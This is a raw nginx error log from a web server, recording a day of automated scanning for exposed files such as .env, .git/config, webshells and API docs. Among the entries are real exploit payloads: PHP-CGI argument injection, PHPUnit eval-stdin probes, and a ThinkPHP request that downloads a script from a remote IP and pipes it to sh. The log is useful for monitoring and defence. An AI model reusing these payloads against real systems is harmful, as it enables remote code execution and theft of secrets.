"91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:21 [error] 230#230: *5254 open() "/var/www/html/wp-includes/css/about.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-includes/css/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:21 [error] 230#230: *5254 open() "/var/www/html/wp-content/index.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/index.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:22 [error] 230#230: *5254 open() "/var/www/html/ioxi-o2.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /ioxi-o2.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:22 [error] 230#230: *5254 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:22 [error] 230#230: *5254 open() "/var/www/html/dlu.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /dlu.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:22 [error] 230#230: *5254 open() "/var/www/html/wp-content/about.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //wp-content/about.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:22 [error] 230#230: *5254 open() "/var/www/html/db.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /db.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:22 [error] 230#230: *5254 open() "/var/www/html/packed.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /packed.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:23 [error] 230#230: *5254 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:23 [error] 230#230: *5254 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //404.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:23 [error] 230#230: *5254 open() "/var/www/html/des.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /des.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:23 [error] 230#230: *5254 open() "/var/www/html/.well-known/content.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET /.well-known/content.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 05:39:23 [error] 230#230: *5254 open() "/var/www/html/lufix.php" failed (2: No such file or directory), client: 4.194.107.19, server: localhost-nginx-proxy-manager, request: "GET //lufix.php HTTP/1.1", host: "91-82-215-191.pool.digikabel.hu" +2026/01/26 06:07:55 [error] 230#230: *5271 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 20.106.32.192, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "91.82.215.191" +2026/01/26 06:19:26 [error] 230#230: *5274 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:29 [error] 230#230: *5274 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:31 [error] 230#230: *5274 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:33 [error] 230#230: *5274 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:35 [error] 230#230: *5274 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:37 [error] 230#230: *5274 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:39 [error] 230#230: *5274 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:41 [error] 230#230: *5274 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:43 [error] 230#230: *5274 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:45 [error] 230#230: *5274 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:47 [error] 230#230: *5274 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:49 [error] 230#230: *5274 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:51 [error] 230#230: *5274 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:53 [error] 230#230: *5274 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:55 [error] 230#230: *5274 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:57 [error] 230#230: *5274 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:19:59 [error] 230#230: *5274 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:01 [error] 230#230: *5274 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:03 [error] 230#230: *5274 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:05 [error] 230#230: *5274 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:06 [error] 230#230: *5274 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:08 [error] 230#230: *5274 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:10 [error] 230#230: *5274 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:12 [error] 230#230: *5274 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:14 [error] 230#230: *5274 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:16 [error] 230#230: *5274 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:19 [error] 230#230: *5274 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:21 [error] 230#230: *5274 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:23 [error] 230#230: *5274 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:25 [error] 230#230: *5274 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:26 [error] 230#230: *5274 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:28 [error] 230#230: *5274 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:30 [error] 230#230: *5274 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:32 [error] 230#230: *5274 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:34 [error] 230#230: *5274 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:36 [error] 230#230: *5274 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:38 [error] 230#230: *5274 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:40 [error] 230#230: *5274 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:42 [error] 230#230: *5274 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:44 [error] 230#230: *5274 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:50 [error] 230#230: *5274 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 117.187.106.252, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:20:59 [error] 230#230: *5275 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 06:32:07 [error] 230#230: *5279 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 64.62.156.108, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.215.191" +2026/01/26 06:34:10 [error] 229#229: *6767 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 64.62.156.108, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.215.191" +2026/01/26 07:07:11 [error] 230#230: *6795 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 07:33:46 [error] 230#230: *6926 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 07:53:45 [error] 230#230: *6973 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 08:34:52 [error] 231#231: *6994 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191" +2026/01/26 08:34:52 [error] 231#231: *6995 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.dtm.sh%3F%3D%5C6f7182e4%29%7Csh HTTP/1.1", host: "91.82.215.191" +2026/01/26 08:34:52 [error] 231#231: *6996 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.215.191" +2026/01/26 08:42:08 [error] 231#231: *7003 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 08:52:38 [error] 231#231: *7008 open() "/var/www/html/.env" failed (2: No such file or directory), client: 95.164.5.48, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 09:28:32 [error] 232#232: *7016 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 10:15:08 [error] 232#232: *7443 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 16:39:31 [error] 198#198: *23 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 16:53:50 [error] 209#209: *6 open() "/var/www/html/server" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /server HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:53:51 [error] 209#209: *7 open() "/var/www/html/server-status" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /server-status HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:53:53 [error] 209#209: *8 open() "/var/www/html/about" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /about HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:53:54 [error] 209#209: *9 open() "/var/www/html/login.action" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /login.action HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:53:55 [error] 209#209: *10 open() "/var/www/html/_all_dbs" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /_all_dbs HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:53:56 [error] 209#209: *11 open() "/var/www/html/v2/_catalog" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /v2/_catalog HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:53:57 [error] 209#209: *12 open() "/var/www/html/.DS_Store" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /.DS_Store HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:53:58 [error] 209#209: *13 open() "/var/www/html/.env" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:53:59 [error] 209#209: *14 open() "/var/www/html/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:02 [error] 209#209: *15 open() "/var/www/html/login" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /login?redir=/ng HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:04 [error] 209#209: *16 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:04 [error] 209#209: *17 open() "/var/www/html/graphql" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "POST /graphql HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:05 [error] 209#209: *18 open() "/var/www/html/api" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:06 [error] 209#209: *19 open() "/var/www/html/api/graphql" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "POST /api/graphql HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:07 [error] 209#209: *20 open() "/var/www/html/graphql/api" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "POST /graphql/api HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:08 [error] 210#210: *21 open() "/var/www/html/api/gql" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "POST /api/gql HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:10 [error] 210#210: *23 open() "/var/www/html/s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /s/139313e2531323e22383e21393/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:11 [error] 210#210: *24 open() "/var/www/html/config.json" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /config.json HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:13 [error] 210#210: *25 open() "/var/www/html/telescope/requests" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /telescope/requests HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:14 [error] 210#210: *26 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:15 [error] 210#210: *27 open() "/var/www/html/actuator/env" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /actuator/env HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:17 [error] 210#210: *28 open() "/var/www/html/swagger-ui.html" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /swagger-ui.html HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:18 [error] 210#210: *29 open() "/var/www/html/swagger/index.html" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /swagger/index.html HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:19 [error] 210#210: *30 open() "/var/www/html/swagger/swagger-ui.html" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /swagger/swagger-ui.html HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:20 [error] 210#210: *31 open() "/var/www/html/webjars/swagger-ui/index.html" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /webjars/swagger-ui/index.html HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:21 [error] 210#210: *32 open() "/var/www/html/swagger.json" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /swagger.json HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:23 [error] 210#210: *33 open() "/var/www/html/swagger/v1/swagger.json" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /swagger/v1/swagger.json HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:24 [error] 210#210: *34 open() "/var/www/html/v2/api-docs" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /v2/api-docs HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:25 [error] 210#210: *35 open() "/var/www/html/v3/api-docs" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /v3/api-docs HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:26 [error] 210#210: *36 open() "/var/www/html/api-docs/swagger.json" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /api-docs/swagger.json HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:27 [error] 208#208: *37 open() "/var/www/html/api/swagger.json" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /api/swagger.json HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:28 [error] 208#208: *38 open() "/var/www/html/@vite/env" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /@vite/env HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:29 [error] 208#208: *39 open() "/var/www/html/.vscode/sftp.json" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /.vscode/sftp.json HTTP/1.1", host: "91.82.215.191" +2026/01/26 16:54:31 [error] 208#208: *41 open() "/var/www/html/debug/default/view" failed (2: No such file or directory), client: 68.183.180.73, server: localhost-nginx-proxy-manager, request: "GET /debug/default/view?panel=config HTTP/1.1", host: "91.82.215.191" +2026/01/26 17:18:03 [error] 208#208: *45 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 17:45:52 [error] 210#210: *1540 open() "/var/www/html/wiki" failed (2: No such file or directory), client: 66.132.153.127, server: localhost-nginx-proxy-manager, request: "GET /wiki HTTP/1.1", host: "91.82.215.191" +2026/01/26 18:04:22 [error] 210#210: *1545 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/26 18:05:24 [error] 210#210: *1546 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.203, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.215.191" 